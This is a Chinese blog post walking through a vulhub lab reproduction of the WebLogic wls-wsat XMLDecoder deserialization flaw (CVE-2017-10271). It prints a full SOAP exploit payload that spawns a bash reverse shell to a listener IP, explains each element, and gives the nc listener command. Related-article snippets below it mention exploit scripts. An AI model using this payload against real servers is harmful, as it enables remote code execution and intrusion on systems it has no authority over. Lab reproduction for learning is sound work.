vulhub-Weblogic-10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)

已于 2023-09-11 22:07:57 修改
阅读量94 收藏
点赞数
文章标签: 网络安全
于 2023-09-08 21:51:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58265086/article/details/132768000
版权

vulhub-Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞漏洞复现(CVE-2017-10271)

漏洞描述

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

漏洞网址

漏洞网址

影响版本

10.3.6.0.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0

环境安装路径

在这里插入图片描述

1:环境初始化

在这里插入图片描述

2:按照提示打开如下页面,404界面

在这里插入图片描述

3.然后将url变更为下列代码,然后使用bp抓包

http://10.9.75.11:7002/wls-wsat/CoordinatorPortType

再把抓到的包,按如下的代码复制,并对反弹sheel的ip更改为kali源码。然后点击发送。

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/10.9.75.11/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
解析:
soapenv:Envelope 元素定义了整个 SOAP 消息的开始和结束。
soapenv:Header 元素包含了与 SOAP 消息相关的头信息。在这个案例中,它包含了一个名为 WorkContext 的命名空间。
work:WorkContext 元素包含了一个名为 java 的子元素,用于指定一个有效的 Java 类。
在 <java> 元素中,<void class="java.lang.ProcessBuilder"> 表示要创建一个进程构建器对象。
<array class="java.lang.String" length="3"> 表示进程构建器将被配置成运行一个由三个字符串组成的命令数组。
<void index="0"><string>/bin/bash</string></void> 表示第一个字符串是 "/bin/bash",也就是要执行的程序路径。
<void index="1"><string>-c</string></void> 表示第二个字符串是 "-c",也就是告诉 Bash 解释器该执行一个命令字符串。
<void index="2"><string>bash -i &gt;&amp; /dev/tcp/10.9.75.11/21 0&gt;&amp;1</string></void> 表示第三个字符串是要执行的命令,在这里是一个 Bash 反向 shell,连接到远程主机的 21 端口。
<void method="start"/> 指示该进程构建器对象应启动一个新进程来执行此命令。
soapenv:Body/ 表示 SOAP 消息的主体部分为空

在这里插入图片描述
然后打开kali,输入代码,这里成功抓到sheel。

nc -lvp 21    // 21为反弹sheel的开放端口

在这里插入图片描述
输入ls -al显示目录下的所有文件夹及文本文档。(这里成功反弹,并获取sheel)
在这里插入图片描述
参考

手打-通天路
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
weblogic __ 10.3.6 __ 序列漏洞 _ CVE-2017-10271
cgjil的博客
09-16 207
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。2、对wls-wsat的资源访问在防火墙或路由器和交换机上做acl访问控制规则。3、在不影响业务的前提下删除相应war包。1、更新Oracle相应补丁。
weblogic_10.3.6序列漏洞复现
最新发布
acdcccc的博客
09-05 307
weblofic_10.3.6序列漏洞复现
weblogic序列漏洞测试jar包
02-17
weblogic序列漏洞测试jar包 如涉及版权问题请与我联系
weblogic相关漏洞复现
weixin_45605374的博客
06-15 1037
weblogic weblogic中间件是是用来构建网站的必要软件,具有解析、发布网页等功能,它是用纯java开发的 CVE-2017-10271 产生原因 CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现序列漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过弹shell拿到权限。 影响版本 10.3.6.0.0,12.1.3.0.
weblogic10.3.6补丁(java序列漏洞更新步骤).docx
09-10
weblogic10.3.6补丁(java序列漏洞更新步骤).docx
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
工具"Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java序列漏洞。在Java中,序列是将对象的状态转为...
Weblogic+XML序列漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 序列漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
CVE-2017-10271 Weblogic序列漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的序列漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的序列过程。这个组件是...
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件序列漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: ...
weblogic序列漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic序列漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
Weblogic10.3.6-2019-4月更新后版本序列漏洞补丁.zip
07-29
Weblogic10.3.6-64位-2019年4月更新后版本--linux系统--序列漏洞补丁
weblogic10.3.6序列补丁包
06-22
weblogic10.3.6.0序列补丁包,p20780171_1036_Generic (2).zip补丁包和p22248372_1036012_Generic.zip升级包,要先安装升级包在安装补丁包
关于weblogic 10.3.6.0 的漏洞复现(1)
aopingying8163的博客
05-08 544
最近小R 搭建了个weblogic, 因为之前在公司找系统漏洞的时候,发现了这个漏洞,所以为了特地专门搭建了个10.3.6.0版本。 漏洞编号: CVE-2017-10271 漏洞的描述:就是weblogic 的WLS组件中存在了CVE-2017-10271远程代码的执行漏洞,可以构造请求运行weblogic中间件的主机来进行攻击。此外,还可以利用此漏洞来进行挖矿。 1. 环境就...
记一次weblogic10.3.6.0漏洞cve-2018-3191补丁升级
老赵的博客
01-13 2371
1、下载补丁包: 因为weblogic10.3.6.0 被网络安全查出cve-2018-3191漏洞,需要更新补丁,在oracle官网补丁不太好找,记录一下; 首先查看文档 https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW 在文档中选中下图位置: 下一步,登录oracl...
WEBLOGIC10.3.5升级到10.3.6并打序列补丁
qq_37293819的博客
05-08 6356
一.WEBLOGIC10.3.5可通过下载升级补丁升到10.3.6,操作步骤如下:1.在升级之前停止weblogic服务2.将版本升级包wls1036_upgrade_generic.jar包放入/Oracle/Middleware/wlserver_10.3/common/quickstart/目录(升级包从补丁包目录获取)3.cd /Oracle/Middleware/wlserver_10....
weblogic序列漏洞测试与解决
热门推荐
公子的专栏
01-21 2万+
一、测试 java -jar CommonsCollectionsTools.jar weblogic 192.168.0.11 7001 F:/a.txt 执行该操作后,如果该IP上的电脑生成a.txt文件,证明漏洞存在(此命令为window下操作,linux下修改文件路径,暂未测试)。 二、解决 1.快速解决 找到..\weblogic\Middleware\module
Weblogic10.3.6序列漏洞补丁更新
maple_fix的博客
05-17 6322
升级步骤(weblogic版本为10.3.6,补丁包版本为:p27395085_1036_Generic.zip): 1、登录linux的weblogic用户,切换到/app/bea/weblogic/Oracle/Middleware/utils/bsu/目录下。(weblogic安装目录因人而异) 2、查看当前weblogic补丁版本,并确认所有域的进程全部关闭 ps -ef |grep...
weblogic 端口号_漏洞复现:Weblogic < 10.3.6 序列漏洞(CVE201710271)
weixin_31955599的博客
01-26 163
文章说明漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习。源码下载连接在文章最后。漏洞说明Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现序列漏洞,导致可执行任意命令。环境搭建1...
Weblogic 10.3.6 ‘wls-wsatXMLDecoder 序列漏洞CVE-2017-10271)
黑白的博客
12-05 616
声明 好好学习,天天向上 漏洞描述 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现序列漏洞,导致可执行任意命令。 影响范围 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 复现过程 这里使用10.3.6.0版本 使用vulhub cd /app/vulhub-master/weblogic/CVE-2017-10271 使用docker启动 docker
Weblogic IIOP序列漏洞(CVE-2020-2551)
07-28
关于Weblogic IIOP序列漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java序列漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值